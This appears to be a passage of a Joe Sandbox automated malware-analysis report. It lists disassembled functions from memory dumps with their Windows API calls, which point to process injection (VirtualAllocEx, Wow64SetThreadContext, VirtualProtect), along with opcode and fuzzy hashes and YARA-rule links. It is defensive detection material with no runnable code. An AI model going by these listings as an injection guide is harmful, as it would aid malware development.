Instruction Fuzzy Hash: 19211B71D003499FDB10DFAAC945BDEBBF5FF48320F108429E959A7250C7789954CBA1

Function 069C8950 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069C89D6

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 00593fcea7112281c69d8b8b245b7af4b4a600e5e8061b7732123973c139fd6d
Instruction ID: d004440b64216c43344bd0e88907e951ff788a7012280bcd2fc691b0be4c083f
Opcode Fuzzy Hash: 00593fcea7112281c69d8b8b245b7af4b4a600e5e8061b7732123973c139fd6d
Instruction Fuzzy Hash: CA2166719003098FDB10DFAAC5457EEBFF4AF48320F50842AD459A7241CB789984CBA2

Function 024EB410 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024ED2C6,?,?,?,?,?), ref: 024ED387

Memory Dump Source

Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a27400a1e698493d43285eba84d3ca288b85c5353fb5ae072bacd38ae074d13d
Instruction ID: ed1c307e7a16c576a8f296df166f84185d0a62cce4728d0711d8036fb117b135
Opcode Fuzzy Hash: a27400a1e698493d43285eba84d3ca288b85c5353fb5ae072bacd38ae074d13d
Instruction Fuzzy Hash: AA21E4B5D00208DFDB10CF9AD984AEEBBF9FB48310F14805AE919A3350D378A954CFA5

Function 069C8958 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069C89D6

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: bf8434c385b3031735fda2a4c843d347a01bae27f274280a893a29279a3090ee
Instruction ID: 8b8e9e9bebdc8d07df910001d543a217771641fee797a77e67f5b367b49ca9b1
Opcode Fuzzy Hash: bf8434c385b3031735fda2a4c843d347a01bae27f274280a893a29279a3090ee
Instruction Fuzzy Hash: 52213771D002098FDB10DFAAC5857AEBFF4EF48324F10842AD459A7240CB78A944CFA1

Function 069A73D0 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 069A744C

Memory Dump Source

Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69a0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: afb9d5ce121f94de2d2c11c15e3ce5cbbd27471e617fab14b29e61fa8b3f5f47
Instruction ID: 2f90bf860c2901b4e39dd26cef03851ba46d789fe24a0e93317c6a9044de7324
Opcode Fuzzy Hash: afb9d5ce121f94de2d2c11c15e3ce5cbbd27471e617fab14b29e61fa8b3f5f47
Instruction Fuzzy Hash: F52107719003499FDB10DFAAC845AEEFBF5EF48320F548429E419A7250CB78A945CFA5

Function 069A73D8 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 069A744C

Memory Dump Source

Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69a0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 15e5d54d2f7343ebfad799383073ade2060f46a657118b2c760bb5f26196ef25
Instruction ID: b9d2f5eeae8fa544f77fff8ba4054fe0e08884f4ccb65d4832993613d3a43f00
Opcode Fuzzy Hash: 15e5d54d2f7343ebfad799383073ade2060f46a657118b2c760bb5f26196ef25
Instruction Fuzzy Hash: 5421E5B1D003099FDB10DFAAC845AEEFBF5EF48320F54842AD519A7250CB78A944CFA5

Function 069C8F61 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069C8FD6

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 21f8b51e650794302b4b55bad79a07437f5100113f62d4bb3af6ad9301f6f2a2
Instruction ID: f24d1798f2f6fee3efbd07a086935faf97de30038353dd49103945c4c07ed960
Opcode Fuzzy Hash: 21f8b51e650794302b4b55bad79a07437f5100113f62d4bb3af6ad9301f6f2a2
Instruction Fuzzy Hash: 58116A719002089FDB10DFAAC945BEFBFFAEF88320F108419E519A7250CB79A540DFA1

Function 068FE250 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 068FE2C4

Memory Dump Source

Source File: 00000000.00000002.2132942549.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 57089aa89374b1cc3abc5362e89f3dd588c6285ec602af7a1b05516ba93b419d
Instruction ID: 473bfea2dcfdc5d1709938fafb62c7644be140195d5cdbf8f406bcdb8374f6bf
Opcode Fuzzy Hash: 57089aa89374b1cc3abc5362e89f3dd588c6285ec602af7a1b05516ba93b419d
Instruction Fuzzy Hash: 8011F7B1D002099FDB10DFAAC944AAEFBF5FF48320F10842AD519A7250DB79A944CFA1

Function 024E9529 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 024E959D

Memory Dump Source

Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c95dd2ab8d7ef24ee14bf37041cb10d48d8b321949c88d60e75d5e58f5038f31
Instruction ID: 2fc67dc318b5dc141d142bb2177203639c8fd4af94b439319f989979022add9b
Opcode Fuzzy Hash: c95dd2ab8d7ef24ee14bf37041cb10d48d8b321949c88d60e75d5e58f5038f31
Instruction Fuzzy Hash: B621E4B19053C4CEDB11DF69D1083EBBFF0EB15304F08449AC489A7682C3399A08CBB5

Function 069C8F68 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069C8FD6

Memory Dump Source

Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69c0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0df7c9a670e0937a5c6afb1181f50559f21935d01d137533576b16ce762d8570
Instruction ID: df4a6416506890c96bd20c01a4f81f5c4f5d2a31fd91e0aa5c90dda8bc97a5c5
Opcode Fuzzy Hash: 0df7c9a670e0937a5c6afb1181f50559f21935d01d137533576b16ce762d8570
Instruction Fuzzy Hash: 631149719002499FDB10DFAAC944AEFBFF5EF88320F10841AE519A7250CB79A944CFA1

Function 024E9538 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 024E959D

Memory Dump Source

Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d76ac77d57b88eedfcd70e07f1136f28dbb2eb124254918981ccc7701f59ce9f
Instruction ID: 4669785c56c31a4d3c2ebd04b6211d6891f5943d9e53b489e84984176f76116b
Opcode Fuzzy Hash: d76ac77d57b88eedfcd70e07f1136f28dbb2eb124254918981ccc7701f59ce9f
Instruction Fuzzy Hash: 3F11EFB1800388CEDB10DF99D1083EFBFF4EB14314F10449AD489A3682D339AA08CFA5

Function 024EAC18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 024EAC7E

Memory Dump Source

Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4318bebfb6376f563f6c9954b4378c3863acd9e2472ad7155d0c60540e78be3d
Instruction ID: dc1477166e7bbbf595f321f38c73eff726c91f9572ebfda733d59da4cd8470fc
Opcode Fuzzy Hash: 4318bebfb6376f563f6c9954b4378c3863acd9e2472ad7155d0c60540e78be3d
Instruction Fuzzy Hash: 78110FB6D002498FDB10DF9AC548ADEFBF4EB88714F10841AD819A7210C379A545CFA1

Function 06CA8A48 Relevance: 1.5, Strings: 1, Instructions: 293COMMON

Download Yara Rule

Strings

,nq, xrefs: 06CA8DD3

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: ,nq
API String ID: 0-1069744364
Opcode ID: 1d8be5fa58ab086dd58bee71ab161cbf0e72a60a5edbe8a1faf8dff3d6cd7a8b
Instruction ID: ca1b0eb5faeb1ca75ba3c17e347bb911bb9b4b2f801ff214cbdb75ca6b32baa5
Opcode Fuzzy Hash: 1d8be5fa58ab086dd58bee71ab161cbf0e72a60a5edbe8a1faf8dff3d6cd7a8b
Instruction Fuzzy Hash: 40C193B4A002189FDB54DF69C945BDDBBF6EF88700F158099E509AB3A5CA34DD81CF60

Function 06CA7B68 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06CA7D92

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 555c439f5aaa264b5e38e3ff7f83ef5dd5f50d1e0a61c807268e57fed16d455d
Instruction ID: f15938e2ed17d880a172faf469f12999603803bddd2059e72af4f4ca4c80b316
Opcode Fuzzy Hash: 555c439f5aaa264b5e38e3ff7f83ef5dd5f50d1e0a61c807268e57fed16d455d
Instruction Fuzzy Hash: 26B10B38A10219DFCB44DFA4D998D9DBBB2FF89304F158159E506AB365DB30ED42CBA0

Function 069D78C1 Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

TJoq, xrefs: 069D79D3

Memory Dump Source

Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69d0000_file.jbxd

Similarity

API ID:
String ID: TJoq
API String ID: 0-3712055613
Opcode ID: 664c3932f881225202251e70aa4759a11f734aa14f3449075f884df449415015
Instruction ID: 38697253c70ce4984b2ff3c0b3a3e13460b473489fc4aee1604a0f537778978d
Opcode Fuzzy Hash: 664c3932f881225202251e70aa4759a11f734aa14f3449075f884df449415015
Instruction Fuzzy Hash: 95710974E052089FEB44EFA8D54469DBBB2FB89710F208029E505AB359DB38AD45CF61

Function 069D78D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

TJoq, xrefs: 069D79D3

Memory Dump Source

Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69d0000_file.jbxd

Similarity

API ID:
String ID: TJoq
API String ID: 0-3712055613
Opcode ID: a3c5aa8bbadbbd531f35ba5e064c16985e9dd52fd663a8472c1ad69d483ff51d
Instruction ID: 060a48a824f4e74e882121692c8fc2ad4df30e28e5dedf33e04ecf6f7ed20f0e
Opcode Fuzzy Hash: a3c5aa8bbadbbd531f35ba5e064c16985e9dd52fd663a8472c1ad69d483ff51d
Instruction Fuzzy Hash: 8271F874E052089FEB44EFE8D54469DBBB2FB89710F208029E509AB359DB38AD45CF61

Function 0699D870 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

pnq, xrefs: 0699D920

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: pnq
API String ID: 0-1150273632
Opcode ID: e17f01e12bab120b11b19e4d2107cc1bb17dd0ea6b6be1b406a58f710504757e
Instruction ID: 551febd0d112bb7de09ff202d28c8999bdc47c012d70e46dce6dc4396e088208
Opcode Fuzzy Hash: e17f01e12bab120b11b19e4d2107cc1bb17dd0ea6b6be1b406a58f710504757e
Instruction Fuzzy Hash: 9F514F76600104AFCB459FA9CD44D6ABFB7FF8D3147158098E2099B376DA36DC22EB60

Function 06CAB819 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06CAB862

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: ee06b1edc96637242eb1ff4ae449d7496729392b795c90bba0879b09053f5ad1
Instruction ID: a35d0c8a55d39d30c4a789fece506586b1097408ad198ba233f289eaf6749a05
Opcode Fuzzy Hash: ee06b1edc96637242eb1ff4ae449d7496729392b795c90bba0879b09053f5ad1
Instruction Fuzzy Hash: 7F418334B107168FCB84AB68C858AAEB7B7AFC9704F10412DD416EB394CF749D46DBA1

Function 06CAC878 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

(nq, xrefs: 06CAC9A4

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: (nq
API String ID: 0-2756854522
Opcode ID: 913a2ac6d9dc15561e8187c757590309408953f71f5abf443cb6b8deed3b7f03
Instruction ID: 581d0db024f0e3f683334b536cf51bdfe176e2c8d512049ccf955aab6e5c72de
Opcode Fuzzy Hash: 913a2ac6d9dc15561e8187c757590309408953f71f5abf443cb6b8deed3b7f03
Instruction Fuzzy Hash: 58419032704244AFCB469F68D814D597FB6FF89320B1680EAE605CF6B2CA35DC11DB51

Function 0699E882 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

(nq, xrefs: 0699E89C

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: (nq
API String ID: 0-2756854522
Opcode ID: a97aae9da15ca86ead8483b75d8a933b624ffd1b58e6541201bf6c899a3c7f08
Instruction ID: 444a282dcc7035c87e3ceb677b09a9ea73da20fc61c9b213dab66ec336d4bb79
Opcode Fuzzy Hash: a97aae9da15ca86ead8483b75d8a933b624ffd1b58e6541201bf6c899a3c7f08
Instruction Fuzzy Hash: 4A41CF31B006168FCB50CF69C884A6AFBB5FF8A320F158695D5659B792C730EC45CBE1

Function 06CAB220 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06CAB2D7

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: f003d7a9d65691b8845d17e59e56f34974ba6977405fc2c6566d0eb5513afe29
Instruction ID: c76ecd1619434f4a0e239e4844c2a3f472cd500711111cba4b2000c69a462d02
Opcode Fuzzy Hash: f003d7a9d65691b8845d17e59e56f34974ba6977405fc2c6566d0eb5513afe29
Instruction Fuzzy Hash: EB41AF317406009FD348DB69C958F2B7BAAAFC8714F114569E60ACF3A5DE75EC02C7A0

Function 06CAB230 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06CAB2D7

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: b108c809bb617b56be60f0573c1f21f41cedf9c629409fcc466a8058c261ffe7
Instruction ID: e0a06643d45efe397afca3e7873ee26acb5cc51e0997da02db5d4a90b733829b
Opcode Fuzzy Hash: b108c809bb617b56be60f0573c1f21f41cedf9c629409fcc466a8058c261ffe7
Instruction Fuzzy Hash: 32319A317406019FD348DB69C998F2B77EAAFC8704F104568E60A8B3A5DE75EC42CBA0

Function 06CA6FD8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06CA7031

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 8a5b4338489f6bbdf13d75f373b6fa1ce23e8a9d6a24babde5fda5770f9bae65
Instruction ID: ee672c6d9e5cbab325b8435f5d3eee9c93692d60debcd19027bc901f37e6ff23
Opcode Fuzzy Hash: 8a5b4338489f6bbdf13d75f373b6fa1ce23e8a9d6a24babde5fda5770f9bae65
Instruction Fuzzy Hash: E531C135600200DFCB459F64D958D9A7BB7FF89310F0640A9EA0AAB275CA32DC02CBA1

Function 0699DD18 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(nq, xrefs: 0699DD68

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: (nq
API String ID: 0-2756854522
Opcode ID: 061f2dd3b083e3e48bd2f26d91446079eeecf6357f214280328c05d1179e0183
Instruction ID: 2c69ec1854c8eb0dff1efa0b8c30622dc7938dd6ac35ba500bda25c6bcf540bf
Opcode Fuzzy Hash: 061f2dd3b083e3e48bd2f26d91446079eeecf6357f214280328c05d1179e0183
Instruction Fuzzy Hash: 0431F5367042556FDB146E6DD8409AF7BABEFCA320B15403AF909CB7A5CE718C16C7A0

Function 06951E8B Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06952659

Memory Dump Source

Source File: 00000000.00000002.2133069233.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6950000_file.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: b30a0624b60b4c1e0251811e847c94ce0999bd3c781edfe94c574110d7422bf1
Instruction ID: 5102db452a5e48abec28c8063bf708e14e64f2bd1eefd244587effeb065d43ed
Opcode Fuzzy Hash: b30a0624b60b4c1e0251811e847c94ce0999bd3c781edfe94c574110d7422bf1
Instruction Fuzzy Hash: E0318730D09249CFDB15CFA9D8046EEBBB5FF85301F1184AAE811A7692D7385E46CFA1

Function 06CA218F Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

p<jq, xrefs: 06CA21DA

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID: p<jq
API String ID: 0-3743064563
Opcode ID: 471f661129e7c6a0321684474ef04ffece71d38ebd42cb3f4077f8ec676ca829
Instruction ID: bc9481f865a474efe153b45a0682fb43ea8606323cc9770dc900a9adefd6ad3c
Opcode Fuzzy Hash: 471f661129e7c6a0321684474ef04ffece71d38ebd42cb3f4077f8ec676ca829
Instruction Fuzzy Hash: 8E2191703042959FCB45CF2ACC54AAA7BE5AF4E214B094095FD54CB361CA35DE50CB20

Function 068FF238 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 068FF2A3

Memory Dump Source

Source File: 00000000.00000002.2132942549.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c9a1f13ae518d0efe59c4bf478e841fbe47bc33737694b46a3f37ca56d4f319f
Instruction ID: 62d41491e6b932399e779b6e24f7daa196c1f434a8ee4a736a61735398d422f9
Opcode Fuzzy Hash: c9a1f13ae518d0efe59c4bf478e841fbe47bc33737694b46a3f37ca56d4f319f
Instruction Fuzzy Hash: 8A1107759002499FDB10DFAAC845BEFBBF5EF88720F148419D619A7250CB79A544CBA0

Function 06995780 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

&, xrefs: 069957D7

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: 43919e47e402549e9a9daaa9e312d768103eb715e99d91f47c147ec30959a825
Instruction ID: adf4f3cb0f196e96251dbcc5f2436722d3caacf0c7640ff662e375e7add688fc
Opcode Fuzzy Hash: 43919e47e402549e9a9daaa9e312d768103eb715e99d91f47c147ec30959a825
Instruction Fuzzy Hash: D5017EB4E01A28CFEF60CF29DC45B9ABBB1BB4D316F0080E9D50EA2641E7345E818F15

Function 06E3260E Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

o, xrefs: 06E3D170

Memory Dump Source

Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e30000_file.jbxd

Similarity

API ID:
String ID: o
API String ID: 0-252678980
Opcode ID: e5f716a8109c74304ae0a9da657f408da38abdecf0980c32e85a7f28388febd4
Instruction ID: 4a6705a44879f81dd9b9791db669d2cf4249ab3c7545e0705353014f239f2340
Opcode Fuzzy Hash: e5f716a8109c74304ae0a9da657f408da38abdecf0980c32e85a7f28388febd4
Instruction Fuzzy Hash: B8F0CD749042188FEB94DF58C88876977B1EB49304F0050D69609A7645DA34AE89CF51

Function 0699A6FB Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

Tejq, xrefs: 0699A72A

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: Tejq
API String ID: 0-2468842661
Opcode ID: a50ff18e3d0a5e352d4cd2bcfabf057d766af9dc53084fe5a0fd8fd0e736ef70
Instruction ID: 9574e71d6d236fa82d83d8cbfa9c2db61d7a71c32883ec9b56a9f60c71d2dce9
Opcode Fuzzy Hash: a50ff18e3d0a5e352d4cd2bcfabf057d766af9dc53084fe5a0fd8fd0e736ef70
Instruction Fuzzy Hash: C0F0F878A102288FDB50DF68C89178EBBB2FF89300F0001D99549A7345D7305E44CF11

Function 06995616 Relevance: 1.3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

Strings

X, xrefs: 06995640

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: 06b6f0cc749cee14a5ca7661247f2759254b7cc5d2609bc099e1c1ee38452ce0
Instruction ID: 6d36009ddeb5c25eb94db8d3c8b8301dca17c62c17a57d5a016338f3040a2991
Opcode Fuzzy Hash: 06b6f0cc749cee14a5ca7661247f2759254b7cc5d2609bc099e1c1ee38452ce0
Instruction Fuzzy Hash: 45D017B8C04368CEDF909F28C89178AB7B0EB00781F0084EA880C66102DA314B889F75

Function 06CABA68 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8887fd48eadd1699aa9fc9078973e333f400b6160ade8e5327e7df6f18cbaa7
Instruction ID: 7e040c4aee5e077291c3a6eb474a9e71c18d7442820ae35262fe6d021bc5ca55
Opcode Fuzzy Hash: d8887fd48eadd1699aa9fc9078973e333f400b6160ade8e5327e7df6f18cbaa7
Instruction Fuzzy Hash: B712FA34A003198FCB94EF68C994A9DB7B2BF89304F5185A8D54AAB365DF30ED85CF50

Function 06CAFA5F Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef20d6fdf413c887393607499a18d084ed610430ba4bffd991697a8349ebb8d4
Instruction ID: d8789fe64fea1b040df7c6e145c611263b359659c4d4e08a1eace340eadd44e5
Opcode Fuzzy Hash: ef20d6fdf413c887393607499a18d084ed610430ba4bffd991697a8349ebb8d4
Instruction Fuzzy Hash: EBC10730A043458FCB76DF29D454A2ABBF2BFC5308F19855DE896CB652CB30E941CB50

Function 0699EB89 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6990000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d976b49d2083ff402b5d2a4f0c38ee5caf04cd7b4952c95a05663ab8e75653ab
Instruction ID: 6ba84204ecd015a6324af3804f490bdcbc65247819055c453ca926f200cbdb82
Opcode Fuzzy Hash: d976b49d2083ff402b5d2a4f0c38ee5caf04cd7b4952c95a05663ab8e75653ab
Instruction Fuzzy Hash: A8919C35B012049FDB55CFA8E844AADBBF6FF88311F258069E905AB790DB31DD41CBA0

Function 06CABA58 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 700c6efeb8a7ba37a1dcb44a27907404a0d5b234625053c395c48942db916182
Instruction ID: ad79153cab307f6182e3870435552368eccf5ada56f78acb2d82f7bc0c496ce1
Opcode Fuzzy Hash: 700c6efeb8a7ba37a1dcb44a27907404a0d5b234625053c395c48942db916182
